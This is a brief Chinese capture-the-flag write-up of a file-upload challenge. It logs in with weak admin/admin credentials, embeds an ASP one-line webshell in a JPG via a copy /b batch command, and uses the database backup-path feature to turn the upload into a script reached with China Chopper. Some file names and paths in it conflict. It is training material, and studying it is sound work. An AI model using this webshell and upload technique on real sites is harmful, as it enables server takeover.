CTF-WebShell文件上传分析溯源(第1题)
根据题意
进入环境,进入后台登录,弱口令 admin/admin 进入后台
在添加文章出发现可以上传一句话木马图片
生成一句话木马图片
准备三个文件1.jpg和1.php和1.bat
其中1.php的内容为<%eval request (“cmd”)%>
其中1.bat的内容为copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件
点击1.bat文件,生成一句话木马asp,jpg
添加文章,上传一句话木马图片。记住返回的路径/uploads/20190808181258906.jpg
在当前数据库路径更改为上传一句话木马返回的路径/uploads/20190808180032649.jpg
记住备份数据库路径,菜刀链接即可获取key